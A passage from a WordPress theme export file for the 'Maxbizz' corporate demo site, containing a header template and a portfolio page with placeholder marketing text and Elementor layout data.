							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_width";i:1;s:10:"logo_image";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:10:"text_color";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:2;s:11:"header_size";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:2:{s:21:"typography_typography";i:2;s:11:"title_color";i:2;}}}}s:13:"image-gallery";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"section_gallery";a:4:{s:10:"wp_gallery";i:1;s:15:"gallery_columns";i:1;s:14:"thumbnail_size";i:1;s:13:"open_lightbox";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:13:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;s:32:"description_typography_font_size";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:6:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:1:{s:15:"hover_animation";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-5/</link>
		<pubDate>Fri, 24 Jul 2020 08:06:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=267</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.</p>		
			<a href="#" role="button">
						CONTACT US
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
								
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-368"><a href="#">About Us</a></li>
</ul>
</li>
<li id="menu-item-364"><a href="#">Portfolio</a></li>
<li id="menu-item-365"><a href="#">Blog</a></li>
<li id="menu-item-366"><a href="#">Shop</a></li>
<li id="menu-item-367"><a href="#">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>267</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 08:06:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 08:06:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-5]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6883fb1","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#F5F5F5"},"elements":[{"id":"bae537d","elType":"column","settings":{"_column_size":33,"_inline_size":86.974999999999994315658113919198513031005859375,"content_position":"center"},"elements":[{"id":"e209fcf","elType":"widget","settings":{"editor":"<p>Maxbizz The Largest Business Expert in USA &amp; Europe. We Provide The Solutions to Grow Your Business.<\/p>","typography_typography":"custom","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3c6c353","elType":"column","settings":{"_column_size":66,"_inline_size":12.0069999999999996731503415503539144992828369140625,"align":"flex-end","_ot_column_min_width":{"unit":"px","size":165,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"856df84","elType":"widget","settings":{"text":"CONTACT US","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":13,"sizes":[]},"typography_font_weight":"500","background_color":"#52C5B6","button_background_hover_color":"#30344D","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"28","bottom":"12","left":"28","isLinked":false}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"e4091a8","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"16","right":"0","bottom":"16","left":"0","isLinked":false}},"elements":[{"id":"95b9eb7","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"ac2109b","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":389},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"27b0423","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"1f76ab2","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"aec3252","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"26188f4","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"df85639","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#30344D","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"5ff3000","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"f7bff2e","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#52C5B6","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""},"menu_typography_typography":"custom","menu_typography_font_weight":"500"},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"42df45d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"94c7570","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF","bg_btn":"#52C5B6"},"elements":[],"widgetType":"isearch"},{"id":"ea13c65","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:4:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:10:"text_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:6;s:16:"content_position";i:1;s:5:"align";i:3;s:20:"_ot_column_min_width";i:1;s:17:"_ot_content_align";i:3;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:10:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:29:"button_background_hover_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:3;}s:14:"section_layout";a:1:{s:16:"content_position";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:4:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:2:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Retirement Plan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/retirement-plan/</link>
		<pubDate>Fri, 11 Sep 2020 04:29:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=797</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>July 02, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>797</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:29:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:29:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[retirement-plan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"60e1ac27","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4c36af66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"4e2f2262","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1e19bf7","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"5fceea31","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"365148c8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"56ce4a9","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"62b7915","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7940adfb","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2711c64d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"10bfada8","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"366a5c36","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"229cd6e2","elType":"widget","settings":{"editor":"<p>July 02, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"460b2861","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3bd9565","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"1171a95e","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"671086a6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6801bcf2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"4a7404d","elType":"section","settings":[],"ele